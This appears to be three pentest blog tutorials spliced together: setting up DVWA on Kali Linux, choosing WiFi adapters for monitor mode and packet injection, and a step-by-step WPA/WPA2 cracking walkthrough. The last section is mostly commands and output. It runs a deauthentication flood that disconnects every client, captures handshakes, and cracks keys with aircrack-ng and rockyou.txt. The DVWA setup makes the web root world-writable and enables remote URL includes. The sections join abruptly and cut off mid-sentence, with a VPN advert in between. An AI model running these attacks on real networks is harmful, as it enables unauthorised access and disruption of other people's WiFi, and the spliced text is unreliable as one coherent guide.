Performing penetration tests on systems without administrative permission is considered illegal and can land you in huge problems, including a jail term with hefty fines.

Practice makes perfect, but then, where do you practice hacking skills?

There are so many platforms available that you can use to practice penetration testing. Some of these are online platforms like TryHackMe, HackTheBox, etc.

Some like Vulnhub allow you to download vulnerable virtual machines that you can exploit. This post will look at one of the platforms that you can install and set up on your Kali Linux system – The Damn Vulnerable Web Application (DVWA).

DVWA is a vulnerable web application developed with PHP and MYSQL.

Yes! It’s intentionally developed to be vulnerable.

From my experience, it’s a great platform for both beginners and skilled since you have an option to set the desired security level (low, medium, high or impossible).

It’s also a great resource for web developers who wish to develop web applications with security in mind.

To learn a bit on how you can practice on it, you can check our related tutorial on explaining SQL injections using DVWA

Let’s dive in and get started right away.

Note: This tutorial should work on other Debian-based distros, as well.

Step 1. Download DVWA

Since we will be setting up DVWA on our localhost, launch the Terminal and navigate to the /var/www/html directory. That’s the location where localhost files are stored.

cd /var/www/html

Next, we will clone the DVWA GitHub repository in the /html directory using the command below.

sudo git clone https://github.com/ethicalhack3r/DVWA

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for kali: 
Cloning into 'DVWA'...
remote: Enumerating objects: 3398, done.
remote: Counting objects: 100% (85/85), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 3398 (delta 38), reused 58 (delta 29), pack-reused 3313
Receiving objects: 100% (3398/3398), 1.65 MiB | 4.21 MiB/s, done.
Resolving deltas: 100% (1508/1508), done.

Step 2. Configure DVWA

After successfully cloning the repository, run the ls command to confirm DVWA was successfully cloned.

ls

DVWA  index.html  index.nginx-debian.html

From the image above, you can see the DVWA folder. Now we need to assign Read, Write and Execute permissions (777) to this folder. Execute the command below.

sudo chmod -R 777 DVWA

To set up and configure DVWA, we will need to navigate to the /dvwa/config directory. Use the command below:

cd DVWA/config

Run the ls command to see the contents of the config directory.

ls

config.inc.php.dist

You should see a file with the name config.inc.php.dist. That file contains the default DVWA configurations.

We will not tamper with it, and it will act as our backup if things go south. Instead, we will create a copy of this file with the name config.inc.php that we will use to configure DVWA. Use the command below.

sudo cp config.inc.php.dist config.inc.php

You can use the ls command to check if the file was copied successfully.

ls

config.inc.php  config.inc.php.dist

Now, open the config.inc.php file with the nano editor to make the necessary configurations.

sudo nano config.inc.php

Scroll down to the point where you will see parameters like db_database, db_user, db_password, etc., as shown in the image below. Feel free to change these values, but note them down since you will require them when setting up the database. In my case, I will set db_user to userDVWA and db_password to dvwa.

...
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'userDVWA';
$_DVWA[ 'db_password' ] = 'dvwa';
$_DVWA[ 'db_port'] = '3306';
...

Save your changes (Ctrl + S) and Exit (Ctrl +X).

Step 3. Configure Database

By default, Kali Linux comes installed with the MariaDB relational database management system. You, therefore, don’t need to install any packages. First, start the mysql service with the command below.

sudo systemctl start mysql

You can check whether the service is running with the command:

systemctl status mysql

● mariadb.service - MariaDB 10.5.9 database server
     Loaded: loaded (/lib/systemd/system/mariadb.service; disabled; vendor p>
     Active: active (running) since Mon 2021-07-26 19:13:38 EDT; 8s ago
       Docs: man:mariadbd(8)
             https://mariadb.com/kb/en/library/systemd/
    Process: 1632 ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d />
    Process: 1634 ExecStartPre=/bin/sh -c systemctl unset-environment _WSREP>
    Process: 1636 ExecStartPre=/bin/sh -c [ ! -e /usr/bin/galera_recovery ] >
    Process: 1699 ExecStartPost=/bin/sh -c systemctl unset-environment _WSRE>
    Process: 1701 ExecStartPost=/etc/mysql/debian-start (code=exited, status>
   Main PID: 1684 (mariadbd)
     Status: "Taking your SQL requests now..."
      Tasks: 15 (limit: 2287)
     Memory: 109.0M
        CPU: 1.339s
     CGroup: /system.slice/mariadb.service
             └─1684 /usr/sbin/mariadbd

To log in to the database, use the command below. In our case, we are using root since that is the superuser name set on our system. If you have something different, then you will need to replace the root.

sudo mysql -u root -p

You will be prompted for a password. However, since we haven’t set any yet, just hit Enter to continue.

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.5.9-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

We will first create a new user using the credentials we set in the config.inc.php file in the DVWA directory. Execute the command below, replacing the username and password with your preset credentials.

create user 'userDVWA'@'127.0.0.1' identified by "dvwa";

Query OK, 0 rows affected (0.010 sec)

We now need to grant this user total privilege over the dvwa database. Execute the command below, replacing the username and password with your credentials.

grant all privileges on dvwa.* to 'userDVWA'@'127.0.0.1' identified by 'dvwa';

Query OK, 0 rows affected (0.001 sec)

That’s it! We are done configuring the database. Type Exit to close it.

Step 4. Configure Apache Server

The Apache web server comes installed by default on Kali Linux. Therefore, we don’t have to need to install any additional packages.

To get started configuring Apache2, launch the Terminal and navigate the /etc/php/7.4/apache2 directory.

Note: As of writing this post, the PHP version available for Kali Linux is 7.4. If there is an update, running the command might raise the no such file or directory error. Therefore, you might first want to check your PHP version (ls /etc/php) and replace it accordingly in the command above.

cd /etc/php/7.4/apache2

When you execute the ls command, you will see a file called php.ini. Execute the command below to edit this file using the nano editor.

sudo nano php.ini

Scroll and look for the allow_url_fopen and allow_url_include lines and ensure that both are set to On.

By default, both or one of them is always set to Off.

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as >
; http://php.net/allow-url-include
allow_url_include = On

Save your changes (Ctrl +S) and Exit (Ctrl + X).

Proceed to start the apache webserver service with the command below. You can check whether the service is running by running the status command.

sudo systemctl start apache2
systemctl status apache2

● apache2.service - The Apache HTTP Server                                   
     Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor p>
     Active: active (running) since Mon 2021-07-26 20:25:48 EDT; 5s ago
       Docs: https://httpd.apache.org/docs/2.4/
    Process: 2245 ExecStart=/usr/sbin/apachectl start (code=exited, status=0>
   Main PID: 2256 (apache2)
      Tasks: 6 (limit: 2287)
     Memory: 17.8M
        CPU: 82ms
     CGroup: /system.slice/apache2.service
             ├─2256 /usr/sbin/apache2 -k start
             ├─2258 /usr/sbin/apache2 -k start
             ├─2259 /usr/sbin/apache2 -k start
             ├─2260 /usr/sbin/apache2 -k start
             ├─2261 /usr/sbin/apache2 -k start
             └─2262 /usr/sbin/apache2 -k start

Step 5. Open DVWA on Your Web Browser

Up to this point, we have configured DVWA, Database, and the Apache webserver.

We can now proceed to start the DVWA application. Launch your Web browser and type the URL below.

127.0.0/DVWA

This action will redirect us to the DVWA setup.php page at http://127.0.0.1/DVWA/setup.php.

When you scroll down, you will see some errors in red color. Don’t panic! Click the Create / Reset Database button at the end of the page.

That will create and configure the DVWA database. After a few seconds, you will be redirected to the DVWA login page.

Use the default credentials below to log in.

• Username: admin
• Password: password

After successfully logging in, you will be greeted by the DVWA homepage. On the left side, you can see all the available vulnerable pages you can use to practice.

You will also see the DVWA Security option that enables you to choose the security level depending on your skills.

That’s it! Now, you can start testing out your web penetration skills on the DVWA.

Conclusion

DVWA is a great platform for both beginners and advanced users because of its multi-layered security support. I believe this post has given you a detailed guide on how to set up DVWA on your Kali Linux system.

If you faced issues or errors in any of the steps above, please feel free to let us know in the comments section or by contacting us.

Most don’t know what they are, why we need them, and how to select the best adapter since we have so many brands and models available in the market.

A wireless adapter is a device that you connect to your computer via the USB port, and it allows you to connect to WiFi networks and communicate with other devices on the network.

🔥 My go-to VPN: 60% Off Special

Been using VPNBaron as my go-to for years. Their Trojan protocol makes it actually undetectable when needed, support is crazy responsive, and they’re running a rare 60% off right now. Works on all devices, adapts to whatever you’re trying to do.

1.99$/month

However, you might wonder: “Why would I need a USB network adapter since my laptop already has an inbuilt adapter that enables me to connect to wireless networks?”

Well, this is among the topics that we will discuss in this post:

• Problems with Built-in Wireless Cards
• Best WiFi adapters for hacking
• How to connect a wireless adapter to Kali Linux Virtual machine

Problems With Built-in Wireless Cards

There are two main problems with built-in WiFi adapters.

1. They can’t be used in Virtual machines – Kali inside a VM does not see the built-in WiFi card of your laptop as a WiFi adapter but will see it as an ethernet adapter. Hence you can have full internet access, but you cannot do packet injection or place the WiFi card into monitor mode.
2. Most built-in cards are not suitable for hacking – In wireless hacking, there are two main factors that we look out for in adapters. That is ‘packet infection’ and support for ‘monitor mode.’ Unfortunately, most of the built-in adapters support non of these two features.

Best WiFi Adapters for Hacking (With Monitor Mode)

Before diving into the different WiFi adapter brands and models, we first need to understand the Wireless Chipset present in these adapters. Like the CPU we have in a computer, this chipset is the “Brains” of the wireless adapter.

It is responsible for all the processing and calculation of data flowing through it. It also determines the capability of the wireless adapter. Whether it can support monitor mode, packet injection, and works with Kali Linux or not.

Some of the chipset supported by Kali Linux include:

• Realtek RTL8812AU
• Realtek 8187L
• Ralink RT5370N
• Ralink RT3572
• Ralink RT5572
• Ralink RT3070
• Ralink RT307
• Atheros AR9271
• MT7610U
• MT7612U

I understand all this information looks gibberish as of now; however, you will appreciate it when we look at the different WiFi adapters available and the chipset they use.

You will notice that the ALFA Networks company highly dominates the Wireless adapter market. Over the past couple of years, the company has risen to stand as the perfect supplier for efficient and reliable WIFI adapters. Other companies include TP-Link and Panda.

The table below shows a list of wireless adapters supported by Kali Linux and the Chipset, Frequency, and Protocol they are using.

Important: When it comes to TP-LINK TL-WN722N, it’s important to know that you can also get v2/v3 to work with a few workarounds, although it’s sometimes assumed that only v1 works.

A great and detailed tutorial on this topic is this one from David Bombal – Kali Linux TP-Link TP-WN722N.

TL-WN722N is a decent budget WiFi adapter for our purposes, but it’s sometimes difficult to find v1 in your immediate area, so v2/v3 is definitely a good option.

In some cases you won’t find the adapter’s version in the product description, so I think it’s definitely good to know you can make it work no matter which of those versions it is.

Connect a Wireless Adapter to Kali Linux Virtual Machine (VirtualBox)

To connect a wireless adapter to your Kali Linux virtual machine, when using VirtualBox, you can go in the Oracle VM VirtualBox menu > Devices > USB > [select_your_adapter].

It may not list the name of the WiFi Adapter, but something related to the chipset, instead. Here, I’m using a TP-LINK TL-WN722N 2.4GHz v2/v3, and as you can see, it’s displaying Realtek 802.11n NC.

Automatically Connect the WiFi Adapter to a VirtualBox VM

You can also automatically connect a wireless adapter to your Kali Linux virtual machine, when running VirtualBox. This way, you don’t have to manually connect it every time

To do this follow the steps below:

1. Shutdown the Kali virtual machine if it was already running
2. Connect your Wireless USB adapter to your PC
3. Right-click on your Kali Virtual machine and select the Settings option. A window will open displaying all the different configuration options.
4. Click on the USB option and check the Enable USB controller check box.
   
   

   

   
   
   We will need to add a USB filter on this window that will enable us to mount our wireless adapter to the Kali VirtualBox VM.
5. Click on the USB icon that has a plus (+) sign and select your Wireless adapter.
   Note: Be careful since the adapter may appear with the chipset na,e instead of the Brand name. For example, my adapter in this case is TP-LINK TL-WN722N 2.4GHz v1 but was listed under the chipset name Atheros AR9271.
   
   If you are not sure of the adapter’s name, just remove it, and you will notice the name that will disappear from the VirtualBox USB list.
   
   

   

   
   
6. Your wireless adapter will be listed under the “USB Device Filters” section.
   
   

   

   
   
7. To finalize everything, right-click on your newly added USB filter and select the Edit Filters option.
   A window will open listing all the details about your wireless adapter. Then, on the Remote option, click on the dropdown and select Yes.
   
   

   

   
   
8. Click Ok to save your configurations.

Connect a Wireless Adapter to Kali Linux Virtual Machine (VMware Player)

To connect a wireless adapter to your Kali Linux virtual machine, when using VMware Player, you can go to the VMware Player menu > Player > Removable Devices > [your_adapter] > Connect (Disconnect from host).

It may not list the name of the WiFi Adapter, but something related to the chipset, instead. Here, I’m using a TP-LINK TL-WN722N 2.4GHz v2/v3, and as you can see, it’s displaying Realtek 802.11n NC.

You should then receive a message informing you that the device will be safely stopped and disconnected from the host machine, so it can then be connected to Kali Linux in the VMware player.

I’m not sure of an easy way how you can automatically connect a WiFi Adapter with VMware Player, as we did with VirtualBox. The solution in VMware knowledge base seems to involve a bit of work https://kb.vmware.com/s/article/1648, and I haven’t tried it myself. If anyone has an easier solution for this and would like to share, then we’d love to hear from you.

Conclusion

Now you can boot your Kali VM and start practicing your wireless hacking skills. You can list all the wireless networks around you and even put your card in monitor mode.

I believe up to this point, you have a working wireless adapter on your Kali Linux VirtualBox machine. Please remember when selecting an adapter for wireless hacking to ensure the chipset used is among the chipsets listed above.

That involves, Cracking WIFI passwords (WEP, WPA, WPA2), Deauthentication attacks (disconnecting users on a WIFI network), Man In The Middle (MITM) attacks, packet-sniffing, and packet-analysis.

This post will give you a detailed guide on cracking WPA/WPA2 WiFi passwords using Kali Linux.

Important: In this article I’ll be demonstrating how to crack a password on my WiFi network. Please do not use this method for non-ethical purposes.

Understanding How Networks Operate

Before looking at how to crack WiFi passwords, you need to understand how a network operates. A network usually contains several devices connected using a wired (Ethernet, Fiber, etc.) or wireless connection (WiFi, Bluetooth, etc.) to share resources. An excellent example of a resource that we connect to networks to access is the Internet.

Whether you are on a wired or wireless network, one device is always considered a server. For example, if you are on a home network, the server would be the router/Access point. To connect to the internet, a Device(A) will send a request to the router, which will, in turn, fetch what you want from the Internet. Data transmitted between the client and the Access Point is known as Packets.

This tutorial will teach you how to capture these packets and use them to crack WPA and WPA2 passwords.

Managed Mode and Monitor Mode?

Every device with access to the internet comes with a chip known as the Network Interface Card (NIC). This chip is responsible for capturing packets sent by the router to our device.

By default, it is set to Managed Mode. That means it can only listen to packets sent directly to our device (packets with our devices’ MAC address as the destination MAC). To crack a WPA or WPA2 WIFi, we need to capture many of these packets. Therefore, we will set our NIC to Monitor Mode. In Monitor Mode, the card will listen to all packets being sent by the router capturing as many packets as possible.

Up to this point, I believe you now have the basic knowledge required to get you started with Network hacking. Boot your Kali Linux machine, and we can begin to crack WiFi passwords.

An Overview of How The Method Works

To give you a short and simple overview so you know what’s coming up, we will:

1. Set our wireless network adapter in monitor mode so it can listen for packets
2. List all available WiFi networks
3. Target a single WiFi network from which we’ll try to capture Handshake packets – these are packets transmitted between the router and the client computer, when they’re trying to establish a connection. We want to capture these packets, because some of them will contain the hashed password.
4. We won’t be decrypting the hashed password, but it still provides a valuable clue. Next we’ll use a large list of popular passwords, and we’ll turn each one into a hashed form, and compare them with the WiFi password, in it’s hashed form, that we got from listening to packets.
5. When the hashes match, this means that we found the password.

Important Notes

1. In our tutorial we’ll use a popular list of passwords, called rockyou.txt, that comes with Kali Linux.
2. If the password you’re trying to crack isn’t in the passwords list, also called wordlist, then we won’t be able to crack it.
3. You can check if the password is in the wordlist by running something like sudo grep -F 'yourpassword' /usr/share/rockyou.txt.
4. Keep in mind that /usr/share/rockyou.txt is archived by default, into /usr/share/rockyou.txt.gz, so you’ll have to extract it first. To do this you can run:
   cd /usr/share/wordlists && sudo gzip -d rockyou.txt.gz

Step 1. Put Your Card in Monitor Mode

On your Kali machine, open the Terminal and execute the command below to list all the connected network devices.

ifconfig

Or

ip a

Related: In case you’re also running Kali Linux in a virtual machine, here is a tutorial on how to connect wireless adapter to Kali Linux in VirtualBox/VMware – Connecting a Wireless Adapter to a Kali Linux Virtual Machine. It also covers the types of wireless adapters you can place in monitor mode and that can do packet injection.

In Kali, the Wireless card will be listed as something like wlan0. I’m using Kali Linux in VirtualBox, with a wireless adapter connected.

In my case, the WiFi network is listed as wlan0:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe2f:7ffe  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:2f:7f:fe  txqueuelen 1000  (Ethernet)
        RX packets 1  bytes 590 (590.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 1452 (1.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 16  bytes 880 (880.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 880 (880.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 2312
        unspec ca-d3-dd-57-cf-30-00-B9-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 20790  bytes 0 (0.0 B)
        RX errors 0  dropped 20790  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

To put your wireless adapter in monitor mode (a mode where the adapter can capture all kinds of WiFi packets) , we will use a tool known as airmon-ng. Execute the command below and replace wlan0 with the name of your wireless card.

sudo airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    399 NetworkManager
   1142 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           8188eu          TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
                (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]wlan0)

Note: You won’t access the internet with your card in monitor mode. It will not even be listed under the network devices on your Settings app.

If your card keeps reverting to Managed mode, you will need to kill all interfering processes with the command below.

sudo airmon-ng check kill

Killing these processes:

    PID Name
   1142 wpa_supplicant

To check whether your card was successfully put to monitor mode, execute the command below:

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11b  ESSID:""  Nickname:"<WIFI@REALTEK>"
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated   
          Sensitivity:0/0  
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=0/100  Signal level=-100 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

From the image above, you can see the wlan0 card is set to Monitor mode. In some cases, the Kali system will add the suffix “mon” to any card in Monitor mode. For example, wlan0 would be renamed to wlan0mon. If that’s the case for you, that is the name you will use anytime you want to call the WiFi card.

Step 2. Test Your Card For Packet Injection

In most wireless attacks, you will need to perform packet injection (Forging or spoofing packets) and unfortunately, not all Network Cards support packet injection.

To test your card for packet injection, execute the command below and ensure you are near WiFi networks. Remember to replace wlan1 with the name of your wireless card in monitor mode.

sudo aireplay-ng --test wlan0

20:10:12  Trying broadcast probe requests...
20:10:12  Injection is working!
20:10:14  Found 7 APs

20:10:14  Trying directed probe requests...
20:10:14  73:6F:5F:92:73:DD - channel: 1 - 'N00bLx Office'
20:10:14  Ping (min/avg/max): 1.831ms/9.501ms/16.956ms Power: -65.80
20:10:14  30/30: 100%

From the image above, you can see my card can inject packets into the network. If that’s not the case for you, you can buy a USB Network card (WiFi dongle) that supports packet injection.

You can also find a list of recommended network cards, along with beginner friendly explanations, in our related tutorial Connecting a Wireless Adapter to a Kali Linux Virtual Machine.

Step 3. Packet Sniffing Using Airodump-ng

Now that we have enabled Monitor mode on our wireless card and even tested it for packet injection, we can now capture packets on our WiFi networks. We will use a tool known as airodump-ng. Execute the command below and press Enter.

sudo airodump-ng <wifi-card-in-monitor-mode>

In my case, I’ll run:

sudo airodump-ng wlan0

CH  4 ][ Elapsed: 12 s ][ 2021-08-27 20:16                                                
                                                                                          
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID           
                                                                                          
17:5A:78:5B:AE:56  -69       44        0    0   1   65   WPA2 CCMP   PSK  Mrs. Test WiFi Network
07:E1:B2:8E:0E:82  -50       49        0    0   6   54e. WPA2 TKIP   PSK  N00bLx Bathroom WiFi          
17:93:7E:F0:FF:A8  -51       41       35    5   1  130   WPA2 CCMP   PSK  The Neighbour       
D3:DA:6D:87:61:86  -52       45        0    0   6   54e. WPA  TKIP   PSK  <length:  0>    
73:6F:5F:92:73:DD  -57       41        0    0   1  130   WPA2 CCMP   PSK  N00bLx Office       
73:E4:D1:03:B1:8D  -65       37        0    0   1  130   WPA2 CCMP   PSK  Mayor's Office      
9B:9D:78:DC:92:43  -67       45        0    0   8  130   WPA2 CCMP   PSK  Sheshe          
AB:25:7A:0A:5C:42  -77       33        4    0   8  130   WPA2 CCMP   PSK  Skynet-4114   
AB:AA:DC:10:4D:3F  -76       27        0    0  10  130   WPA2 CCMP   PSK  Mark_cdd5e8     
B3:10:82:55:F1:57  -86       21        0    0  11  130   WPA2 CCMP   PSK  MARK-7NfA       
2F:78:E6:5B:0F:2B  -93       40        1    0   5  540   WPA2 CCMP   PSK  home network     
AB:30:6D:D1:31:E5  -93       27        0    0   6  130   WPA2 CCMP   PSK  Mobile-1615   
F3:F1:AE:18:A2:46  -93        4        0    0   1   48   WPA2 CCMP   PSK  MrBot_80     
63:8C:27:81:CB:8D  -93        2        0    0  11  130   WPA2 CCMP   PSK  UPC2076594      
D7:BF:F1:DF:52:23  -93        3        0    0   5  130   WPA2 CCMP   PSK  Bob      
EB:48:C0:6D:98:35  -86       24        7    2   3  130   WPA2 CCMP   PSK  TP-Link_47F0    
07:E1:06:1A:32:B1  -89       35        0    0  11  130   WPA2 CCMP   PSK  Some Netowrk       
4F:FB:76:4D:66:EA  -93       14        0    0  11  130   WPA2 CCMP   PSK  Mobile-746339   
9B:53:21:87:20:38  -93       17        2    0   3  130   WPA2 CCMP   PSK  LALA124173       
E3:88:A3:6E:6B:F5  -93        5        0    0   1  130   WPA2 CCMP   PSK  HAI-Fh9n       
CB:9B:94:7E:0A:AE  -93        2        0    0   1  130   WPA2 CCMP   PSK  BATMAN2629688      
6B:8B:B1:59:88:0E  -93        9        0    0   1  130   WPA2 CCMP   PSK  HI              
                                                                                     
                                                                                          
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes         
                                                                                          
(not associated)   33:C6:35:3F:05:D8  -94    0 - 1     41       10         LALA-4qnS      
(not associated)   57:B1:C8:C5:37:1B  -94    0 - 1      0        1                        
0F:93:59:43:F0:E4  23:1D:97:42:42:F3   -1    1e- 0      0        3                        
0F:93:59:43:F0:E4  9B:C5:40:6E:34:34   -1    1e- 0      0        3                        
0F:93:59:43:F0:E4  13:17:36:01:1A:D2   -1    1e- 0      0        2                        
0F:93:59:43:F0:E4  53:85:C5:90:21:D9  -74    1e- 1e     8       12

You will see a screen similar to the one in the image above. The program will continue running unless you close it using Ctrl + C or Ctrl + Z.

Let’s discuss the information on this screen.

• BSSID: This column displays the MAC address of the target network. That is the MAC address of the router or the Access Point.
• PWR: This is the signal strength or the power of the network. The closer the number is to zero, the better signal we will get.
• Beacons: These are frames sent by the Access point to broadcast its existence
• Data: These are the valuable data packets or frames that will help us in cracking wireless networks
• #/S: This column shows us the number of data packets we have collected in the last 10 seconds
• CH: This column indicates the channel on which the network is operating.
• MB: That indicates the maximum speed supported by the network.
• ENC: This column indicates the encryption used by the network
• CIPHER: Indicates the Cipher used on the network
• Auth: This shows the mode of authentication used to connect to the network
• ESSID: This column indicates the name of the WIFI network

In this step, all we did was random packet sniffing. We did not target any particular WiFi network or store the sniffed packets.

However, that is useful since it gives you detailed information about networks near you.

In the next step, we will look at targeted packet sniffing.

Step 4. Targeted Packet Sniffing

The difference between WPA and WPA2 is that WPA uses TKIP (Temporal Key Integrity Protocol) while the latter is capable of using TKIP and any other advanced AES algorithm. However, the method that we will use to crack the password is the same for both networks.

To crack WPA/WPA2 wifi networks, we will utilize the handshake packets. These are four packets transmitted between the router and the client when establishing a network connection. To capture packets on a specific network, we will use the syntax below.

sudo airodump-ng --bssid <MAC-of-AccessPoint> --channel <channel-number> --write <name-of-file> <card-name>

From the image above, I will be cracking the password for the network with ESSID “Mrs. Test WiFi” I will use the command below.

sudo airodump-ng --bssid 17:5A:78:5B:AE:56 --channel 1 --write mrstestwifiPackets wlan0

Now all you need to do is sit back and wait for the tool to capture as many Handshake packets as possible.

CH  1 ][ Elapsed: 6 s ][ 2021-08-27 20:20                                                                                      
                                                                                                                               
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                            
                                                                                                                               
17:5A:78:5B:AE:56  -22  93       88        0    0   1   65   WPA2 CCMP   PSK  Mrs. Test WiFi Network                           
                                                                                                                               
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

However, there is one problem.

Handshake packets are only captured once – when a device connects to the network. Therefore, to capture as many handshake packets as possible, we will need to use an attack to remove users from the network and reconnect. Deauthentication attack. That will help us capture more handshake packets.

To carry out a deuathentication attack, open a new Terminal, while leaving the current one running and trying to capture Handshake packets, and execute the command below:

sudo aireplay-ng --deauth 50 -a <BSSID-MAC> <Wireless-Card>

In my case, I’ll run:

sudo aireplay-ng --deauth 50 -a 17:5A:78:5B:AE:56 wlan0

20:32:03  Waiting for beacon frame (BSSID: 17:5A:78:5B:AE:56) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:32:03  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:03  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:04  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:05  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:05  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:06  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
...

The command will send 50 deauthentication packets, which are enough to disconnect several clients from the router. Once they reconnect, we will capture their handshake packets. All these packets are stored in the “mrtestwifiPackets” file we specified when performing a targeted sniffing.

Step 5. Cracking WPA/WPA2 Using a Wordlist

When we have captured enough Handshake packets, we can start to crack them using a wordlist.

Execute the ls command on your working directory. You will see several files with the name which you specified to save your sniffed packets. Look for the file with the .cap extension. That is the file we will use to crack our WiFi password.

The tool that we will use is known as aircrack-ng. Use the syntax below:

sudo aircrack-ng <packet-file-name> -w <wordlist_path>

In my case, I will run:

sudo aircrack-ng mrstestwifiPackets.cap -w /usr/share/wordlists/rockyou.txt

And here is the successfully cracked WiFi key.

As you can see where it says KEY FOUND! [ mrpassword].

This process might take some time, depending on your wordlist and the complexity of the key. Some tips you can use to speed up the process are using the GPU, which is much faster, or uploading the captured handshake file to an online cracking site. These sites use powerful computers which can crack passwords even faster. You can also create your wordlist using a Python or Bash script or use the crunch tool.

Conclusion

This tutorial has given you a detailed guide on cracking WPA/WPA2 key against a wordlist. With a large wordlist, you can easily crack different combinational passwords. However, if the key is very complex, using a wordlist may not always work. If you encountered any issues, then feel free to let us know in the comments and we’ll get back to you as soon as we can.